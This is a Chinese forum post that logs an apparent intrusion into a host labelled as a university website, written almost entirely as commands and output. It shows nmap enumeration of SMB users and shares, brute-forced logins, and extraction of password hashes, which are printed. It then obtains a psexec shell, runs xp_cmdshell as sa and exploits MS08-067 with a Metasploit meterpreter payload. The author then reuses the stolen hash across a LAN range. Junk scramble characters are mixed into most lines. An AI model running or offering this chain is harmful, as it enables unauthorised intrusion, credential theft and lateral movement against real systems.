广西师范网站http://202.103.242.241/
- l9 V+ P9 t. a3 `, b: M3 Z, E0 l' |) Z. S7 E7 G, i% O3 B; G
root@bt:~# nmap -sS -sV 202.103.242.241
5 t* f, d/ g* C$ F! U
9 a* b2 \# A& {( @5 B$ qStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST! \" j- c5 p0 W7 e2 t
1 B, k9 ]3 _$ M4 ~* K
Nmap scan report for bogon (202.103.242.241), \& i1 S# @ \( f
) F) r- E3 |4 Y e8 p, b, }Host is up (0.00048s latency).; s3 F% j* ^3 Q( Y7 ~6 b* A( h
" }8 O/ a7 H# A/ U8 b$ zNot shown: 993 closed ports
3 I4 r/ Z! n# W) k s' k+ z2 d6 ^9 P9 E% T7 d$ q6 s- D
PORT STATE SERVICE VERSION4 o& }2 l. Q1 Y/ _+ L9 o0 O
) \9 G$ g( [5 T* u; t
135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
& m6 |! u( }0 a; O2 D; p2 q- Y
139/tcp open netbios-ssn
8 ^ C; q+ M+ g, k/ R2 I: q% w; u) r7 F; n( P; X( _3 v& _
445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds* X8 k! i0 B, r0 }& @" c6 s2 h
- F7 |* f. C) b/ P. c. r
1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe). ?0 n$ p" I) [) y o
' N6 B' D4 y8 C$ P8 U
1026/tcp open msrpc Microsoft Windows RPC1 @, N! k2 u1 L* z
2 F2 v: o) C. s: [: T* }, @. p+ y
3372/tcp open msdtc?
0 P& D7 L0 G+ [9 o R8 @" c0 @7 V# N8 L `' l6 y( a1 q# W* P
3389/tcp open ms-term-serv?
- j* d4 b% m1 p' G' R8 f$ v6 t5 s% |% f# b% d3 }' @
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
( [3 {4 \, W ]6 `SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
# J' o U8 k) d! {4 z5 g, |* z9 ]; c: k7 i" p8 S; w: F& w$ X* W4 `( V9 ~
SF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions
+ C6 C# H; Q5 V7 d* W( s( H R+ e3 R/ n1 t5 Y
SF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)0 F h, g' l7 L p( B2 u
5 V) V$ H" I, e: w, n
SF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO2 p$ F5 \; I/ [
8 x7 U4 ^8 F3 K7 ^) Q- m i# f
SF:ptions,6,”hO\n\x000Z”);. t* e: L5 i" `' K! r
4 T+ c2 ^' q: E+ @5 R3 a6 a2 |MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
( p( s5 P4 Q- k: j% d& R! ?3 S, L% k
Service Info: OS: Windows
3 S5 \' ], u7 }: }1 N4 J9 u3 v" R4 c5 u
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
6 n" `1 O' k% }* f' Q: \) k* v/ r, S* H" U6 V! o m
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds
$ X, y" j3 P& Z8 Q5 U, }! v. ~/ F3 w# T% M4 D$ v% G+ Z
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本
) g! d0 @+ a5 X- s2 _7 {
6 |; ]4 J7 P* F9 M+ H2 d K-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse+ o4 f( S6 \* {
% n2 B4 J5 V, Q( t( x. K9 }
-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
! {: V: J) w' Y' a
^: c* o% R: N) [. T3 O-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse
9 s& r( n3 o; n" w8 j7 Q# {: V9 W- F" r9 M% x$ L$ F
-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse) \: I6 J; Z' f2 D* b
. V; z# r- y# S7 m! S) P% ]-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse
5 @6 p' E9 s+ q( l `( G& y# g( X+ s V4 P E; Q8 U6 I
-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
# L- V, A2 ~ |' w7 f6 U1 U, E# b) t# j& `1 l; }( G. c* b
-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse- k4 d6 S, V) ~3 l* D
" M j/ }# f3 ?( p& }! @-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse/ \3 |2 d7 j/ F6 ~# R" s+ F/ p7 g
5 x7 [% [! l5 l
-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse
7 ^3 h0 V0 d, O% D% j3 N9 }5 B- s6 X
-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse
$ W/ w+ q/ ?* ~' h# a' J% @/ l, u/ D: M' A# h" W
-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
: @9 p& ?# e8 c4 I
+ s, [. w- L/ E# V' y+ }% B6 s-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse
( w! \' X ^% ~; E2 G% [* Q0 D( U' Z" G* O9 }
-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse0 I7 w) A8 d; |
& Y4 b' l) X0 r: o( j7 w-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
: G( j3 n! b. U% W& r7 k: y; V2 G1 Q" }+ O0 W& |5 F3 |
-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse# v+ U# c3 W; k" q5 L
7 N; P" l' i0 Q. r3 {root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241 ! V0 O$ z: b! I4 H$ c2 P8 s
# _( r; q3 _" C) k
//此乃使用脚本扫描远程机器所存在的账户名
' t( T( f I5 V# ?) Q( ~8 c* p
* A# ?7 C( l5 i5 f) c) hStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST6 O6 K8 z8 h/ C }
, G7 \' Y6 x) G7 O
Nmap scan report for bogon (202.103.242.241)6 O. C! s) n6 t
! T" s d! G5 Y0 I/ zHost is up (0.00038s latency).; F3 i4 }: E& I7 v. a8 e6 N7 B3 P% g
- d* I" o9 U5 ^% UNot shown: 993 closed ports1 C. n2 D$ E7 r$ J
: z7 F4 p" v7 h' X
PORT STATE SERVICE6 \" Q. J: p& [! F
# x$ I$ J/ _$ }' h# u3 X5 W; p! `
135/tcp open msrpc! L% v$ P* D- K5 \1 v
* k( t' a9 E/ f1 {% ]% k0 w6 T
139/tcp open netbios-ssn
; K' X' `0 u9 x& G" Z/ Y% Z. `! _) s% i5 d8 T4 t
445/tcp open microsoft-ds
& i4 d% v7 U- e1 z) h5 k2 p2 e
" t% F+ L$ F* ]+ P* ?6 I: _1025/tcp open NFS-or-IIS# t# a* W& d' J" O. R2 b; A
; U! { k: H S7 g( v0 R5 M5 |
1026/tcp open LSA-or-nterm0 z8 H" b& J, w2 [( S
, I4 F7 I( }+ _
3372/tcp open msdtc
0 S' F) [' D9 J0 ^% U, w/ s) }9 J/ j" k$ @! x& b) E, \
3389/tcp open ms-term-serv
$ [3 u4 [" d, J3 [% n6 E% r% C/ s3 j% ?. {4 p+ ?' p9 E& @ ]1 z
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)$ x9 ]& p# m( J0 B$ r4 }
' X7 U* q8 H, f$ ^5 I: @
Host script results:/ I% f) l, k1 q/ a4 f$ W
B J4 d; G- w7 [8 R1 [) ?+ A8 Y
| smb-enum-users:; p8 p0 [7 d, _- T
/ }- I c# P6 e. v8 N6 w|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果9 l2 F; x# g3 p4 U2 }
; t3 c l5 x+ P3 S% o
Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds
- r1 C H5 j8 V1 y: b' l$ B B: f, ?& z2 X6 P$ Z
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241
$ [! w3 S! J( b5 n, j, P( _" ?$ q6 q2 F* m+ X6 b
//查看共享5 N0 O4 b3 f! l, u1 n" \. s4 u+ a$ S4 Q' l
3 E% b- Q" k' k! gStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
: G5 }% V1 q. i; Q* b) ~/ K2 j# W: x$ j( y- V
Nmap scan report for bogon (202.103.242.241)
2 A* i6 Z w8 L' J; \2 p+ t, O; L8 Q) m. k3 H
Host is up (0.00035s latency).
5 i0 \. E8 Y2 I# `8 n
; d0 K! `' I; r, S# w1 LNot shown: 993 closed ports) h7 g6 A' N4 g, c! o0 X
" O. @' |0 x P$ u |
PORT STATE SERVICE
5 _# z' U1 q/ ]" @! A
* c8 Y% E. S! C. \6 o( E135/tcp open msrpc
' z$ h/ Y5 n1 w
9 z- r2 _0 T: W6 ]' \, |139/tcp open netbios-ssn
. d! f* i. Q# s$ ~4 V# ^: W9 X6 r) U- R) V
445/tcp open microsoft-ds/ b4 k5 _4 P, \- a3 K9 {$ M$ I
' |/ y8 ?+ |* q$ T( {1025/tcp open NFS-or-IIS3 Y( R2 Z% D1 l+ ], ]
' L& J6 Y1 J$ I, u1026/tcp open LSA-or-nterm
$ ^7 I K* l& s! ]6 r+ P; M. y5 i) \/ p; A* o; a4 b
3372/tcp open msdtc8 T9 ?( p8 a* P1 Y) l6 h& b& X! X; @, F
, T5 o3 i8 I+ Y- X* [. v+ ?- d
3389/tcp open ms-term-serv
8 i* j6 z% F" j! h4 H" U
) S4 t4 T6 f: {# k8 @/ CMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)2 z) t ^) y0 I8 H" S
* O4 S' N8 M# n4 ]3 L+ }3 RHost script results:
! K+ M5 V4 W8 E5 |+ H ?! j; m" Y% I& `/ u4 O
| smb-enum-shares:
1 k* Y7 o7 x$ e5 ~5 L' n) R0 D6 J: [; {; a1 v; K: G
| ADMIN$ R! ~+ M |" r: m ?* \
+ J/ Z0 t* S0 \, `1 B| Anonymous access: <none>5 F1 P* B$ |: O, u. B2 L- K
- N$ ~3 ]+ U3 L3 \5 m) Z| C$
$ e G( I' L# F
+ k6 [- L l5 _0 M' G' m% Z| Anonymous access: <none>% r3 P7 Q. t+ Y0 B0 B
1 i C3 P% k/ ^
| IPC$
0 s6 W& C3 B. Q4 o3 n& P5 D3 I: |) R5 C; D4 h6 ^2 `
|_ Anonymous access: READ
/ @3 g: _5 q9 l; X5 F
o- t* Y- n6 l D0 D; o3 rNmap done: 1 IP address (1 host up) scanned in 1.05 seconds1 f0 E, K& d; m7 f& H( j- x
0 X; B0 S( _: P& E5 _5 i3 O; c" Uroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241
* Z ]+ h+ V) q# [
$ I% ^9 f' @$ Y& k//获取用户密码
' G) |0 e2 i3 ~7 w; ]$ C5 @' L! [9 g
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
: I; j; H1 u+ C T M3 h& c' _: z T+ F5 T% ^% Y$ q
Nmap scan report for bogon (202.103.242.2418)
) {) X. O9 ?4 t9 y& [3 f% o3 i
* q0 i9 d2 p- WHost is up (0.00041s latency).& q6 O* g; m: m. R! j6 j+ X* @
: _- Q* }; A4 x" R+ _" mNot shown: 993 closed ports0 J* D% c- w* W8 t) V* v5 g
( c2 V$ n9 D- `4 Y% c& sPORT STATE SERVICE7 R0 t/ f, E* V5 ]! L2 ~8 D
$ X! O! n5 Q$ L135/tcp open msrpc
! V ^" c$ k2 ~+ V) P" {
4 c% ^: x5 A8 q8 x- i' `139/tcp open netbios-ssn
0 p- ]! T3 r1 U3 _. Z& P" A' Z; {- C) N* A% S1 O+ L6 n0 |7 {
445/tcp open microsoft-ds
" C4 g& e2 {. _+ |' `' ~( ~ p/ ?. i
; [0 K8 M+ g$ c" n/ z1025/tcp open NFS-or-IIS
: e$ ?$ \. o: f7 g: i- K, K; e# ^$ O& e! A6 E
1026/tcp open LSA-or-nterm. F* P# Y* j" N" q& E. O
! ]# n8 n- E" `% u _
3372/tcp open msdtc; E3 E* T. Y( z4 S
# F& J1 L6 t) ~) p0 J6 n* w3389/tcp open ms-term-serv
9 \1 Y5 h- ]- C: q; Q* ]1 j9 }' n# ^* Z
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)1 `/ q' m3 w0 x5 w" s% H V
( T7 Y, R: e1 P; E; j j6 X
Host script results:$ l: h1 G3 `1 q! P+ V
& D0 x1 `* L8 c, @% n& [| smb-brute:
' e# _& i6 M& X, B8 J2 J
+ u; b/ F, ~6 ^5 |. Gadministrator:<blank> => Login was successful4 Z Y0 \* A, o/ |4 J# m- S
9 o' h+ Z* @2 q( c3 a8 E
|_ test:123456 => Login was successful6 O9 y; l5 i% B; n
: u" [1 _* j3 V7 C" e+ ONmap done: 1 IP address (1 host up) scanned in 28.22 seconds
0 X* t% L d) E3 X
8 H: s6 N* L/ n, l% hroot@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash
$ X1 I, H+ N8 u
+ V* B: [/ t+ d" F1 {" S6 Q" B5 Hroot@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data6 h( S8 q* Q7 g) J& q
k0 q0 v8 B! Q) s% \& r# mroot@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
0 B( m, Z# z+ ~ s
6 e, h2 W {" g1 [: zroot@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139& u; A& t; ?3 d3 C
$ D" `8 z( ^& ]4 I3 v
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
9 o1 o6 b4 ?) a. u& E3 Q% A3 c m; X7 q. _/ Y8 T0 D: W. t
Nmap scan report for bogon (202.103.242.241)% X) m" w8 |9 [4 b3 }. j
( O b0 U1 ?& \( t8 oHost is up (0.0012s latency).$ ~ D# A) M, Z5 M' ]. v) ^* \
# u3 M0 K" ~6 APORT STATE SERVICE
9 t1 _( e' p* M% Z# o
5 x; t& h2 N0 h7 L0 Q, ]135/tcp open msrpc
; @1 e) U( }$ Y i5 J" g0 W% b0 \
/ w: a: k; m' f" ^% G9 z" `139/tcp open netbios-ssn5 K3 T2 ^3 F: o3 d. H6 G& t' E
9 ?7 L# ~- p3 [445/tcp open microsoft-ds S6 P2 M6 E, v0 v: s( j
" o1 l5 t5 ~) c; W
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)/ q$ W$ T! w) x0 `! d
$ }; Z/ }* i8 n7 t6 E) J
Host script results:' s7 V/ Z% ^! Q/ R. d
9 G- L8 ~9 w5 n. J$ ]$ E' \1 `3 K% ^
| smb-pwdump:
$ s9 _: r5 |8 m' w
9 I3 R% G# V" u5 I4 ^: v" Z* g| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
: U9 ?' H2 t) u- Z2 v3 t2 I3 S! f ]
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
: p0 Q! t' p. a6 P2 P6 ]3 L- N; }: b" n
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
8 @0 m7 C! o; d+ \# C& K
, _) d$ [) ?5 A( H# E, i+ B7 _; E3 d|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D22 k+ o+ E( Q) ?8 ]6 d
% c9 ?, j9 W1 E" k6 [. wNmap done: 1 IP address (1 host up) scanned in 1.85 seconds
. M- w+ H7 t7 R9 H0 `9 S( y% }! [: [: A! n
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell' d' X; I% w4 F
5 D7 `$ w* w" A( v" Z* O5 y
-p 123456 -e cmd.exe
7 O! x+ D/ F8 v; i2 c! t& k& x
9 S4 r/ s; y6 H0 s( VPsExec v1.55 – Execute processes remotely" y G' h {* z9 N
* T: }8 [' `. ~# B) M( u/ nCopyright (C) 2001-2004 Mark Russinovich7 O. \$ p) b) V! a' C
! p: {* g2 R# ^9 M2 }3 v2 j
Sysinternals – www.sysinternals.com
9 G& L5 m3 K# |" q7 j: I& y- g' c. B) m2 B5 J/ [1 v7 j
Microsoft Windows 2000 [Version 5.00.2195]' W& M0 W3 @6 j
$ K6 H6 A/ _2 E
(C) 版权所有 1985-2000 Microsoft Corp.
" {" A# [4 m' t. H" r1 G: w: ?1 o" h9 O0 m2 A5 |; f0 n$ _
C:\WINNT\system32>ipconfig
+ y' C( c, u( ~& c m# c
g# U1 I/ {3 Z! v& W J7 M: XWindows 2000 IP Configuration
; i- t4 ^" m' x. ~
6 K$ ~5 }9 A4 Y# m+ IEthernet adapter 本地连接:
1 C6 I! J5 i: V* P; C$ u+ y5 h! q' @2 v, }( M8 o7 u# s
Connection-specific DNS Suffix . :) U* }% U' ~; ]( X% Y2 V; r H0 Y7 b$ N, S
) ^7 C* u1 m \( L' L( N3 O
IP Address. . . . . . . . . . . . : 202.103.242.241
/ }0 C3 x$ j7 |$ V/ m# X8 E# I& ~5 {! e/ f- |6 x( ]* _; H
Subnet Mask . . . . . . . . . . . : 255.255.255.0* x- {3 _+ S h4 l
/ b- y8 u+ w- [% M) DDefault Gateway . . . . . . . . . : 202.103.1.1: \2 ?6 O. B- b D7 \$ X
. y% y2 c1 ?% W4 ^1 g4 c4 hC:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令
. ?7 |) T# V+ A
5 j. K+ _& g8 J, I+ |3 w, d0 Croot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞
. E4 @. v) R- f: q, M, P! I+ ~$ \, M) ?, ?
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
4 s. A; Q9 y7 `7 ?: @. _* e9 g, p& p
Nmap scan report for bogon (202.103.242.241)
; @4 r+ i( B7 ~: p0 _' J0 M! J, d+ T J i3 Q0 v
Host is up (0.00046s latency).. H% @8 X- h, _) I- ?' ~
& N3 ~/ o+ X) Z( NNot shown: 993 closed ports6 e, N4 I7 L+ ^
/ x6 W! Y% b# D* RPORT STATE SERVICE1 P' w; B$ b1 P/ Q, H2 P- m* f
. s4 O2 ~, l' T1 L: @" g0 T0 s
135/tcp open msrpc4 w/ U2 L; v- }2 h1 I8 m J4 ^
" J) X1 z0 z! o$ [0 Y: d
139/tcp open netbios-ssn& C- g$ |$ V9 j, `
; t# c4 B+ }$ C5 D. E445/tcp open microsoft-ds1 J: o1 _4 K1 Q% k! O
, W0 o7 [4 L2 w( e, d+ G& [1025/tcp open NFS-or-IIS
& q6 |* O: h5 x* N t/ P; J6 a1 l1 O/ [9 [1 W
1026/tcp open LSA-or-nterm) j+ m7 I" J( K6 K
) Y. I$ U4 f$ U
3372/tcp open msdtc: ] T/ Z6 ~2 V; u& G `8 f5 N3 ?5 U
4 H% F6 Z8 w* h/ r' @3389/tcp open ms-term-serv- g2 E9 F; g9 ~6 |
; |" ], W" W: zMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
: m6 S. H& c" E/ `4 \, E
. O# h2 T! ~, I8 L/ A4 d7 a* UHost script results:
3 V7 D/ ^/ X6 d( g5 @- p! h' ?
' f" i; F: V8 P4 s| smb-check-vulns:5 X! s! m2 d3 q' p- x0 m$ V
; L( r, u& V( T5 Q
|_ MS08-067: VULNERABLE
* _# Y, r; z8 Q8 M4 d( ~; Q, ?6 b: ~ b1 p) D0 w. c; p
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds' X D7 `2 T2 z c, a
; E5 Z; E3 m( ]. M, k% Y
root@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出4 ^, J/ {- e; c8 Z# i# A
2 M- j0 _% @ S) B" Q6 f: _
msf > search ms08
2 t$ T" b9 ~: N7 p l N/ |" O2 m k
msf > use exploit/windows/smb/ms08_067_netapi
% u& L6 W- m7 n% \) r4 W5 C
; A. E- W; P/ A: Vmsf exploit(ms08_067_netapi) > show options: H2 `! j& C# ?0 k) R
/ q; ^' i& s2 f$ e2 Cmsf exploit(ms08_067_netapi) > set RHOST 202.103.242.241" v; R; }' U4 p R4 \1 s3 B" c2 ^
; K' [* H6 P& Y. K* F0 C
msf exploit(ms08_067_netapi) > show payloads
. y0 h# v4 N. Z) h$ B U o, u- h0 _9 }+ @7 p
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
m3 T) k5 q0 ^6 ^4 g: i; G( w; P$ k6 Z) ^4 |! p
msf exploit(ms08_067_netapi) > exploit
6 A& r& u7 n: _& E# E1 ?" |( Z
: |. p, u+ f6 R5 Cmeterpreter >$ s6 Y4 _' |5 S) ^
1 X5 x, x9 @+ ^( Z9 P
Background session 2? [y/N] (ctrl+z)# J: {% B/ A. W
6 Y/ A: X( I7 n" i9 e' F% T
msf exploit(ms08_067_netapi) > sessions -l
6 U3 ^3 B4 ?% I" B
/ Y- E8 X2 [; G e) U7 Z0 Qroot@bt:/usr/local/share/nmap/scripts# vim usernames.txt, q5 d) Y: w* c* y8 [' s! h; |
$ k) g5 n+ I' Y/ r3 ?test# T. j! U5 ?% C( n6 S$ u
" N6 g8 L' x. Y) P- D: Z
administrator
! \ q$ e, @3 c% {# k- ^, U+ w
' R; C. h' e" _5 ?% rroot@bt:/usr/local/share/nmap/scripts# vim password.txt
( E. G2 a* n5 J+ @( b' J4 a7 P1 g/ g
5 [+ L) b5 z7 p* E5 q/ L! p44EFCE164AB921CAAAD3B435B51404EE4 U3 X0 N- n/ }( B7 J& q" ?& L
. E& p& i* d4 T( h8 ~root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254 : F+ Z0 N7 i( ?2 c) r1 X
" M3 A& D' t; f' Q* ?# E //利用用户名跟获取的hash尝试对整段内网进行登录) q& x! z4 D1 t& C9 Z/ j
& z4 q8 M% O! O. T- ^Nmap scan report for 192.168.1.105
: | u) x3 n1 _" @5 Z
F6 T3 m3 V: k" WHost is up (0.00088s latency).
: B/ G. X" ^3 V
% K! @- Y4 Y j8 eNot shown: 993 closed ports/ p: i1 {+ Z& G$ Y4 u
2 O" @' l' Y: O d0 n
PORT STATE SERVICE3 t$ k& z$ [; H- S: b$ [: v
4 v Q0 Q$ d, @135/tcp open msrpc
s, [$ q- H$ d3 [2 Q# D) U4 C7 M4 T" t
139/tcp open netbios-ssn( O/ _* |+ N% ~0 K2 k$ h' q
, U' E* y% X% ^5 i1 V9 n
445/tcp open microsoft-ds9 n4 v$ M3 n( t0 P( @5 [
! A5 ^" J5 l4 ~3 J# R0 c1025/tcp open NFS-or-IIS
7 J. l6 J, F3 U! t' u
/ I7 D( }3 [# \- A1026/tcp open LSA-or-nterm( Q; E* Q {( Y
3 r8 y" F- d. v/ f: b4 E- q
3372/tcp open msdtc+ `% n8 y1 o0 h+ a
. W! A* V+ S" E6 k
3389/tcp open ms-term-serv
" B7 L1 ~2 f: M }
# K: i( v4 ?' D# N5 `" x7 u1 W( _6 DMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems); \; Y$ J* S% t. @
# b: K: p/ V0 Z- R
Host script results:
# p- l' z7 b2 a! z( N u- b" P! E! n4 d! ~
| smb-brute:( l& n+ v# L" i( t1 E7 j
6 a( i5 x' l5 c7 l3 e|_ administrator:<blank> => Login was successful
4 Z4 A6 b6 J z( v1 b! j9 C* j( y' L9 y& u: m
攻击成功,一个简单的msf+nmap攻击~~·) Y3 s# h) b! Y% G
8 ]! b: c! |. J! l |
发表于 2012-12-4 12:46:42
收藏
支持
反对